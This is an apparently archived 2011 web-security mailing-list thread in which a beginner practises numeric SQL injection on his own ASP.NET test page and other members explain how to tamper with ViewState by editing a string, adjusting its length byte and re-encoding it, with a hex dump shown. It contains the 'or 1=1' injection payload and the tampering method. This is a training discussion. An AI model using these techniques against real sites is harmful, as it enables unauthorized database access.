Sorry, I realize my comment was pretty brief. In your case, the string to be modified is part of an array of strings, so you need to look for the length field elsewhere. I've highlighted a hint below, although the formatting might not survive the email list.
0000000: ff01 0f0f 050a 3130 3131 3735 3433 3234 ......10117543240000010: 0f64 1602 0203 0f64 1602 0201 0f10 0f16 .d.....d........0000020: 061e 0d44 6174 6154 6578 7446 6965 6c64 ...DataTextField0000030: 0503 4e6f 6d1e 0e44 6174 6156 616c 7565 ..Nom..DataValue0000040: 4669 656c 6405 0849 645f 5669 6c6c 651e Field..Id_Ville.0000050: 0b5f 2144 6174 6142 6f75 6e64 6764 1015 ._!DataBoundgd..0000060: 060a 4361 7361 626c 616e 6361 0552 6162 ..Casablanca.Rab0000070: 6174 0453 6166 6906 5461 6e67 6572 0641 at.Safi.Tanger.A0000080: 6761 6469 7205 5361 6669 6515 0603 3230 gadir.Safie...200000090: 03 3230 31 3230 3203 3230 3303 3230 0.201.202.203.2000000a0: 3403 3230 3214 2b03 0667 6767 6767 6764 4.202.+..ggggggd00000b0: 6418 0105 0947 7269 6456 6965 7731 0f3c d....GridView1.<00000c0: 2b00 0a01 0802 0164
The general case of reverse engineering viewstate is quite interesting. Give me a week or so and I'll write up some notes about doing this in C++ with Boost Spirit on my web site (it's actually quite fun!)
--- On Thu, 4/28/11, Oussama Gabi oussama.gabi@gmail.com wrote:
From: Oussama Gabi oussama.gabi@gmail.com
Subject: Re: [WEB SECURITY] Numeric SQL injection ASP.NET
To: "Mike" mike@deadliestwebattacks.com
Cc: websecurity@lists.webappsec.org
Date: Thursday, April 28, 2011, 2:56 AM
sorry , i didn't understand ,
2011/4/27 Mike mike@deadliestwebattacks.com
Viewstate strings have a length field in the serialized form. So you'd need to append the "or 1=1" and adjust the length by 6 characters. In this simple hack, try looking for your string and a leading byte of 0x05 or 0x1e followed by a byte that indicates the length of the string.
(I've greatly simplified the description of viewstate serialization. For example, lengths greater than 127 bytes require an extra step to decode.)
From: Oussama Gabi
oussama.gabi@gmail.com
To: Erlend Oftedal erlend@oftedal.no
Cc: websecurity@lists.webappsec.org
Sent: Wednesday, April 27, 2011 2:47 AM
Subject: Re: [WEB SECURITY] Numeric SQL injection ASP.NET
Hello guys,
For testing I put the enableViewStateMac to false, now there is no hash at the end of the ViewState. Then I intercept the request with BurpProxy.
The ViewState code is %2FwEPDwUKMTAxMTc1NDMyNA9kFgICAw9kFgICAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQNOb20eDkRhdGFWYWx1ZUZpZWxkBQhJZF9WaWxsZR4LXyFEYXRhQm91bmRnZBAVBgpDYXNhYmxhbmNhBVJhYmF0BFNhZmkGVGFuZ2VyBkFnYWRpcgVTYWZpZRUGAzIwMAMyMDEDMjAyAzIwMwMyMDQDMjAyFCsDBmdnZ2dnZ2RkGAEFCUdyaWRWaWV3MQ88KwAKAQgCAWQ%3D
I get something like that when i decode it :ÿ1011754324ddDataTextFieldNomDataValueFieldId_Ville_!DataBoundgdCasablancaRabatSafiTangerAgadirSafie200201202203204202+ggggggdd GridView1<+�
d
my goal is to add or 1=1 to display all the cities with tamperature .So i add it after the value selected in the dropdownlist e.g 201, it will be 201 or 1=1i encode the all to base64.
but i got an error session information is not valid....
i've tried to change the centent-length in vain..
I know it's stupid, but i wanna make this exemple..
this is my Code https://gist.github.com/943987
do you have any ideas please?
Thank youBest regardsOussama GABI
2011/4/25 Erlend Oftedal erlend@oftedal.no
Hi
Sharing the code could be a good idea. Maybe put it up on github or
something.
Best regards,
Erlend
On 25.04.2011 17:38, Oussama Gabi wrote:
Yes, i've disabled the enableValidation, for the
ViewState i added EnableViewState=flase in the dropdownList
without any result.
The server response:
Status=OK - 200
Server=ASP.NET
Development Server/10.0.0.0
Date=Mon, 25 Apr 2011 16:22:39 GMT
X-AspNet-Version=2.0.50727
Cache-Control=private
Content-Type=text/html; charset=utf-8
Content-Length=1331
Connection=Close
Thank you very much
2011/4/25 Ryan Dewhurst <ryandewhurst@gmail.com>
Is the ViewState and EventValidation being URL encoded when
being sent back to the server?
What is the HTTP response you are getting?
Ryan Dewhurst
blog www.ethicalhack3r.co.uk
projects www.dvwa.co.uk
| www.webwordcount.com
twitter www.twitter.com/ethicalhack3r
On Mon, Apr 25, 2011 at 1:15 PM, Oussama
Gabi <oussama.gabi@gmail.com>
wrote:
Hello guys,
I am a beginner in web application Security, so I
started to train on webgoat.i would like to make
numeric SQL injection attack but in ASP.net.
So I created a dropdownlist that retrieves the
names of cities and a gridview for display!
The problem is when I change the ID value with
tamperdata, nothing happens. I look a bit and I
think that's a problem with ViewState, so it's
impossible to make this attack in ASP.net?
how could circumvent this viewstate or Disenable
it for testing. Or any hint!
Thank you !
Best regards!
_______________________________________________
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org